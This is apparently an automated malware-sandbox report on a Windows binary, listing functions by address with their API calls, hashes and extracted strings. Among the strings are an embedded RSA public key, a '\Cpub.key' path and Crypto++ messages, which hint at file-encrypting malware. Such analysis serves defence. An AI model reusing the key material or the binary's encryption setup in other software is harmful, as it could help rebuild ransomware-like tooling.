Opcode ID: e1028f45c2a51bd837d7a3df2b26af7910e3ad3024c8d989530364e9262b5e14
Instruction ID: f8497ca05b972e0fbb2c15857616288c6a18bc632d2e4b14ee0f1a9aae0ddb5a
Opcode Fuzzy Hash: e1028f45c2a51bd837d7a3df2b26af7910e3ad3024c8d989530364e9262b5e14
Instruction Fuzzy Hash: 833187B3720A548AFB00CB25E8903E93BB4F725B95FA84027CA8A53774EB34C557C380

Uniqueness

Uniqueness Score: -1.00%

Function 0144D5D4, Relevance: 7.6, APIs: 5, Instructions: 60threadCOMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0144D5F8
CreateThread.KERNEL32(?,?,?,?,00000000,013DD6C8), ref: 0144D639
GetLastError.KERNEL32(?,?,?,?,00000000,013DD6C8), ref: 0144D647
CloseHandle.KERNEL32(?,?,?,?,00000000,013DD6C8), ref: 0144D664
FreeLibrary.KERNEL32(?,?,?,?,00000000,013DD6C8), ref: 0144D673

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseCreateErrorFreeHandleLastLibraryThread_invalid_parameter_noinfo
String ID:
API String ID: 2067211477-0
Opcode ID: 9fb57aa82db074b063989fece26eeb526fe2245c4c4c655245ec0b370c095116
Instruction ID: 0ad2dfe6d11b935b629c8cd6a0aeb8254046a917d797e508f44bb3f2098a6f79
Opcode Fuzzy Hash: 9fb57aa82db074b063989fece26eeb526fe2245c4c4c655245ec0b370c095116
Instruction Fuzzy Hash: 9F115976A06B8187EF15DFAAA45036AA7A0AFB4BD4F084426DE4D07B38DF3CD005CA00

Uniqueness

Uniqueness Score: -1.00%

Function 01408E20, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 201COMMON

Download Yara Rule

APIs

_Wcsftime.LIBCMT ref: 01408EA5
_Wcsftime.LIBCMT ref: 01408FAF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0140909F

Part of subcall function 01440748: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,0141FC06), ref: 0144078C
Part of subcall function 01440748: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,0141FC06), ref: 014407D2

Strings

StringNarrow: wcstombs_s() call failed with error , xrefs: 014090BA, 014090FD

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Wcsftime$ExceptionFileHeaderRaise_invalid_parameter_noinfo_noreturn
String ID: StringNarrow: wcstombs_s() call failed with error
API String ID: 405629397-1818402112
Opcode ID: 54f1008d4141efb5262622e10a1a3459593c70764ff1b908f607c9c0ea296fa2
Instruction ID: da9d95037eaef8ba80d1892fa0e5500b3e085e6ea609b91c70b6244e788c9fb2
Opcode Fuzzy Hash: 54f1008d4141efb5262622e10a1a3459593c70764ff1b908f607c9c0ea296fa2
Instruction Fuzzy Hash: 0271ED62724A8191EB01DB7AE54079E7B62F7957D8F405226EF9E03BBADF38C194C700

Uniqueness

Uniqueness Score: -1.00%

Function 013DA420, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 173COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013DA4C7

Strings

MIICIDANBgkqhkiG9w0BAQEFAAOCAg0AMIICCAKCAgEAw/e1WN2RDlZ/9md10KzUpWlxrT4OZ5i86V8WSvEe6oBeJzctIk5HSO6ZxifUG2DZSCxjLLVldfB4na99WsCKe/5Ut0ZEGReLaHfzTXPAaluABfbBnwXGIBopPBcKgdfLQLps0/k7njlzYdlYmr617c5d6GRZ0eWBKDXl2bzYX2iNPwDB660gA/UlZxXHHZwWT69HbeIqH+oGrPj3BOTJo5kH, xrefs: 013DA4D6

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: MIICIDANBgkqhkiG9w0BAQEFAAOCAg0AMIICCAKCAgEAw/e1WN2RDlZ/9md10KzUpWlxrT4OZ5i86V8WSvEe6oBeJzctIk5HSO6ZxifUG2DZSCxjLLVldfB4na99WsCKe/5Ut0ZEGReLaHfzTXPAaluABfbBnwXGIBopPBcKgdfLQLps0/k7njlzYdlYmr617c5d6GRZ0eWBKDXl2bzYX2iNPwDB660gA/UlZxXHHZwWT69HbeIqH+oGrPj3BOTJo5kH
API String ID: 3668304517-3729741635
Opcode ID: 64a60542b4f3c31c3ef6746ced9c0cd0e0fbf5bf94a30602bfd62d8c5c6580a1
Instruction ID: 70ce65c51c6a4154fc689ecfb4dbecb13a3082876c9ce530aa5f983333047b45
Opcode Fuzzy Hash: 64a60542b4f3c31c3ef6746ced9c0cd0e0fbf5bf94a30602bfd62d8c5c6580a1
Instruction Fuzzy Hash: 0941216330169485EE199B2AF64432C7362E754FE8F584A25CF6D0BB99EF78C4D2C304

Uniqueness

Uniqueness Score: -1.00%

Function 0144E790, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 154COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0144E7CA
_invalid_parameter_noinfo.LIBCMT ref: 0144E99F

Strings

, xrefs: 0144E91D
*, xrefs: 0144E8C8

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _invalid_parameter_noinfo
String ID: $*
API String ID: 3215553584-3982473090
Opcode ID: 6d88d7029f59f23f34ecf1c10aa5832a41d0db9eb7e5e5dc79063a1236ce146f
Instruction ID: 6a448f39cb05cf9cc749a3854026bf32db18912c5f38b33e6f469fed6a070566
Opcode Fuzzy Hash: 6d88d7029f59f23f34ecf1c10aa5832a41d0db9eb7e5e5dc79063a1236ce146f
Instruction Fuzzy Hash: 0B517D7A508251CBFBA9CF2D805513D3F61F356B58B18122BCB86223B9CB38C482CB45

Uniqueness

Uniqueness Score: -1.00%

Function 0144E578, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 151COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0144E5A4
_invalid_parameter_noinfo.LIBCMT ref: 0144E5D6

Strings

, xrefs: 0144E729
*, xrefs: 0144E6D4

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _invalid_parameter_noinfo
String ID: $*
API String ID: 3215553584-3982473090
Opcode ID: f7ac1f3312fd0e8ca7a8a2f79bc156c7b73661fc3a41384f1332cf4596613400
Instruction ID: 1bcc5a1b21a5cac56b5bfd6026acd539fe09bd658723a41dade12d8fee5c110f
Opcode Fuzzy Hash: f7ac1f3312fd0e8ca7a8a2f79bc156c7b73661fc3a41384f1332cf4596613400
Instruction Fuzzy Hash: 205189721082508BFB69CF3DC09836A3BA1F316B69F48121BCB4666379DB3DC486CB41

Uniqueness

Uniqueness Score: -1.00%

Function 01403E60, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 124COMMON

Download Yara Rule

APIs

Part of subcall function 013DE300: Concurrency::cancel_current_task.LIBCPMT ref: 013DE480
Part of subcall function 013DE300: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 013DE486

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0140402F

Strings

:@, xrefs: 01403FC1
: Nonblocking input is not implemented by this object., xrefs: 01403F64, 01403F82
6, xrefs: 01403F79

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task
String ID: :@$6$: Nonblocking input is not implemented by this object.
API String ID: 3936042273-2502767172
Opcode ID: 8ccb00938dee3504b599a8260cec7f3c4b6860940479600939a46f398083ec7c
Instruction ID: 311a96890991f785a6dea9e26d05972097c3f0b50242aed0d95ca0ccdf3d1853
Opcode Fuzzy Hash: 8ccb00938dee3504b599a8260cec7f3c4b6860940479600939a46f398083ec7c
Instruction Fuzzy Hash: 2D419B72214B8486EB00CF56F49439EB761F799BD4F544226EB9C03BA8DF79C595CB00

Uniqueness

Uniqueness Score: -1.00%

Function 014479F4, Relevance: 6.2, APIs: 4, Instructions: 193COMMON

Download Yara Rule

APIs

Part of subcall function 01449D68: DName::operator+.LIBVCRUNTIME ref: 01449DF9
Part of subcall function 01449D68: DName::operator+.LIBVCRUNTIME ref: 01449E32
Part of subcall function 01449D68: DName::operator+.LIBVCRUNTIME ref: 0144A15B

DName::operator+.LIBVCRUNTIME ref: 01447B4D
DName::operator+.LIBVCRUNTIME ref: 01447BAC
DName::operator+.LIBVCRUNTIME ref: 01447BDE
DName::operator+.LIBVCRUNTIME ref: 01447BEE

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Name::operator+
String ID:
API String ID: 2943138195-0
Opcode ID: 11da866d2d6c0116b618d50cc1b085cacb597086430fbfaf0489c2d983e5dc52
Instruction ID: 9273f9129585b4972e4fc29d1f560d97c96be9b67e012a2a43b8f0c27096a700
Opcode Fuzzy Hash: 11da866d2d6c0116b618d50cc1b085cacb597086430fbfaf0489c2d983e5dc52
Instruction Fuzzy Hash: 49816A72A10B908AFB11CBA5E8403ED3BB1F355759F598017CF496BB74DBB88586C380

Uniqueness

Uniqueness Score: -1.00%

Function 013B1DE0, Relevance: 6.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

__std_exception_copy.LIBVCRUNTIME ref: 013B1F3F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013B1FD4
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013B1FDA
__std_exception_destroy.LIBVCRUNTIME ref: 013B2002

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy__std_exception_destroy
String ID:
API String ID: 2138705365-0
Opcode ID: 453731ba14cb26c527776d3440ca54c78153705353a0dffc7eada5b25ba1bd77
Instruction ID: 7b2ea2f8059666d2ec3f0243225557146b0631f0843dae88ccc857471e26f129
Opcode Fuzzy Hash: 453731ba14cb26c527776d3440ca54c78153705353a0dffc7eada5b25ba1bd77
Instruction Fuzzy Hash: DC617D72B14B818AEB10CFA9E48039D77B2E755B98F404629DF5C17BA8EF78D1A5C340

Uniqueness

Uniqueness Score: -1.00%

Function 01448178, Relevance: 6.1, APIs: 4, Instructions: 134COMMON

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 0144821D
DName::operator+.LIBVCRUNTIME ref: 0144822D
DName::operator+.LIBVCRUNTIME ref: 0144824A
DName::operator+.LIBVCRUNTIME ref: 0144827F

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Name::operator+$NameName::
String ID:
API String ID: 168861036-0
Opcode ID: d8fdef5e25b3ef23ecbd00542d04bb6e68f470ee3a5bc8c5357881197545cee1
Instruction ID: 32351b49dbd027fb8079a4e40e8de31ad39f1ebbb00ab55cd4f1a6b27b6576c2
Opcode Fuzzy Hash: d8fdef5e25b3ef23ecbd00542d04bb6e68f470ee3a5bc8c5357881197545cee1
Instruction Fuzzy Hash: 5B51A172610B568AFB11CFA5F8807AD3BB0F355B98F588412CB0957775CB7AC142C740

Uniqueness

Uniqueness Score: -1.00%

Function 01403C80, Relevance: 6.1, APIs: 4, Instructions: 132COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 01403CE3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 01403CE9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 01403D28
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 01403D6C

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task
String ID:
API String ID: 3936042273-0
Opcode ID: 760a1951694834a9108da64dae0bf4b327b86f717f85d703b7fc3faca87c6611
Instruction ID: d96fd86a0901f4106f086000aefbf00d6fcec512da00cc0b770cc949a1c9db43
Opcode Fuzzy Hash: 760a1951694834a9108da64dae0bf4b327b86f717f85d703b7fc3faca87c6611
Instruction Fuzzy Hash: AE41DE26715A858AEE198F2BD44531E6BA0FB59FE0F544623DF6D07BE8DA7CD0928300

Uniqueness

Uniqueness Score: -1.00%

Function 0144A21C, Relevance: 6.1, APIs: 4, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 01449D68: DName::operator+.LIBVCRUNTIME ref: 01449DF9
Part of subcall function 01449D68: DName::operator+.LIBVCRUNTIME ref: 01449E32
Part of subcall function 01449D68: DName::operator+.LIBVCRUNTIME ref: 0144A15B

DName::operator+.LIBVCRUNTIME ref: 0144A297
DName::operator+.LIBVCRUNTIME ref: 0144A2A6
DName::operator+.LIBVCRUNTIME ref: 0144A322
DName::operator+.LIBVCRUNTIME ref: 0144A331

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Name::operator+
String ID:
API String ID: 2943138195-0
Opcode ID: a196dbff9fa7a122856a6ed8d0568c497a17f382f21d9bc1744bd840c2e4028a
Instruction ID: 230c98aa5cbce0b7478606d3b33db793eaae5fb34c087bf8535568d0e097e1eb
Opcode Fuzzy Hash: a196dbff9fa7a122856a6ed8d0568c497a17f382f21d9bc1744bd840c2e4028a
Instruction Fuzzy Hash: 51415E73A00B94CAFB01CFA8D4403AD77B0F359B48F64841ADB4A5B729DB79C481C750

Uniqueness

Uniqueness Score: -1.00%

Function 01453358, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 238COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 014533BA

Strings

MIICIDANBgkqhkiG9w0BAQEFAAOCAg0AMIICCAKCAgEAw/e1WN2RDlZ/9md10KzUpWlxrT4OZ5i86V8WSvEe6oBeJzctIk5HSO6ZxifUG2DZSCxjLLVldfB4na99WsCKe/5Ut0ZEGReLaHfzTXPAaluABfbBnwXGIBopPBcKgdfLQLps0/k7njlzYdlYmr617c5d6GRZ0eWBKDXl2bzYX2iNPwDB660gA/UlZxXHHZwWT69HbeIqH+oGrPj3BOTJo5kH, xrefs: 01453361

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _invalid_parameter_noinfo
String ID: MIICIDANBgkqhkiG9w0BAQEFAAOCAg0AMIICCAKCAgEAw/e1WN2RDlZ/9md10KzUpWlxrT4OZ5i86V8WSvEe6oBeJzctIk5HSO6ZxifUG2DZSCxjLLVldfB4na99WsCKe/5Ut0ZEGReLaHfzTXPAaluABfbBnwXGIBopPBcKgdfLQLps0/k7njlzYdlYmr617c5d6GRZ0eWBKDXl2bzYX2iNPwDB660gA/UlZxXHHZwWT69HbeIqH+oGrPj3BOTJo5kH
API String ID: 3215553584-3729741635
Opcode ID: 292372f584f0a7d8638a4ddb4acb2f58469577f3125ae64059d7e88de2e6d8f5
Instruction ID: 403fd0f02d013decc3ccbdf2431797a2bdc1a1d30f4b6d40514f9eb6fe7d87e7
Opcode Fuzzy Hash: 292372f584f0a7d8638a4ddb4acb2f58469577f3125ae64059d7e88de2e6d8f5
Instruction Fuzzy Hash: D481097271568089EB71CF69D44026E77E5F748BE8B04462BDE6A07BEADF34C452C720

Uniqueness

Uniqueness Score: -1.00%

Function 0144E9A8, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 169COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0144E9E0
_invalid_parameter_noinfo.LIBCMT ref: 0144EC09

Strings

*, xrefs: 0144EAED

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _invalid_parameter_noinfo
String ID: *
API String ID: 3215553584-163128923
Opcode ID: 0da7d9f4516afd2681cce682ec104111259e680b42b9eba575e77ff1fa85a1c7
Instruction ID: 4e85642e3adf2cc555f0b915acb44530beb51ab307429b96719f9c08ebe4c245
Opcode Fuzzy Hash: 0da7d9f4516afd2681cce682ec104111259e680b42b9eba575e77ff1fa85a1c7
Instruction Fuzzy Hash: 6151AE76500290CBFB2ACF2D804412E3BA0F345F58B58126BDF83667B8DB39C582CB65

Uniqueness

Uniqueness Score: -1.00%

Function 013DF710, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 150COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013DF8E2
Concurrency::cancel_current_task.LIBCPMT ref: 013DF8EE

Strings

\Cpub.key, xrefs: 013DF71C

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID: \Cpub.key
API String ID: 73155330-3023347968
Opcode ID: 64fbc8dab5ada6e4b57fc36c481db5c2bd4babb17ff24dc884bbc1377d62443d
Instruction ID: ada0278162dbe373d5ea70c1ec0dd92dd81345b1780624e032e62f49f5c6957c
Opcode Fuzzy Hash: 64fbc8dab5ada6e4b57fc36c481db5c2bd4babb17ff24dc884bbc1377d62443d
Instruction Fuzzy Hash: 61411233610B9492EA14DF26E1802997765F325BE8F144B26CFAE47791CF78D1D6C381

Uniqueness

Uniqueness Score: -1.00%

Function 013E0970, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 013E0AF5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013E0B01

Strings

NameValuePairs: type mismatch for ', xrefs: 013E0973, 013E0975

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID: NameValuePairs: type mismatch for '
API String ID: 73155330-2289452559
Opcode ID: 9cc0bfc036dcc64927a2bb9c236141376777223576453fcece4595cc320fa6c0
Instruction ID: 0b1b814988d5f45b1674f9791ba208839650495037a87e0f2a2635b58771f3ae
Opcode Fuzzy Hash: 9cc0bfc036dcc64927a2bb9c236141376777223576453fcece4595cc320fa6c0
Instruction Fuzzy Hash: 2841E372311B5995EE189B2AE54429963A5F758BE8F480726EFBD07BE4DFB8C091C300

Uniqueness

Uniqueness Score: -1.00%

Function 0145F4C8, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0145F50B

Strings

gfff, xrefs: 0145F62D
e+000, xrefs: 0145F5B0

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _invalid_parameter_noinfo
String ID: e+000$gfff
API String ID: 3215553584-3030954782
Opcode ID: c6da4b8ad1d83ad730ae29a7bed62618721dd9f76a53856078818295acf6e66e
Instruction ID: 7215a8fb60be7820de179fed878d241cadad43af175d8cd372da467f0adefa56
Opcode Fuzzy Hash: c6da4b8ad1d83ad730ae29a7bed62618721dd9f76a53856078818295acf6e66e
Instruction Fuzzy Hash: B04107627147C586D7658F3AD94075A7B91E391B94F48D226CFA84BBBBCB3CC049C702

Uniqueness

Uniqueness Score: -1.00%

Function 013E07A0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 013E0957
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013E095D

Strings

\Cpub.key, xrefs: 013E07A5

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID: \Cpub.key
API String ID: 73155330-3023347968
Opcode ID: acf26e45558202f405faee42a22c686a046235ec09be744b9146e9a08a16ac3a
Instruction ID: ad04c1ad722f48e5428400e4abf4dad6e7e7e39a76915c41aafb998562a34ac5
Opcode Fuzzy Hash: acf26e45558202f405faee42a22c686a046235ec09be744b9146e9a08a16ac3a
Instruction Fuzzy Hash: D041F276310B9995EE18DF26E45829D67A5F754BE8F884626EFBD07B94CF78C140C300

Uniqueness

Uniqueness Score: -1.00%

Function 01406000, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 127COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 014061C7

Part of subcall function 01405F60: __std_exception_copy.LIBVCRUNTIME ref: 01405F8D

Strings

*, xrefs: 014060A8
FileSink: error opening file for writing: , xrefs: 01406093, 014060B1

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __std_exception_copy_invalid_parameter_noinfo_noreturn
String ID: *$FileSink: error opening file for writing:
API String ID: 1109970293-3616816822
Opcode ID: b62f23c99ffdefa3286b6051d21495231ab21ff3056f97c24929688c3dbd5a1a
Instruction ID: db5a9647c61d75daca19da21424188d79385cb1212d41c138b9b51070b3ba9c3
Opcode Fuzzy Hash: b62f23c99ffdefa3286b6051d21495231ab21ff3056f97c24929688c3dbd5a1a
Instruction Fuzzy Hash: 5C519F76314B8496DB00DF66F48039EB361F799B94F944522EB9D07BA8EF78C194CB00

Uniqueness

Uniqueness Score: -1.00%

Function 013DA2A0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 013DA409
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013DA415

Strings

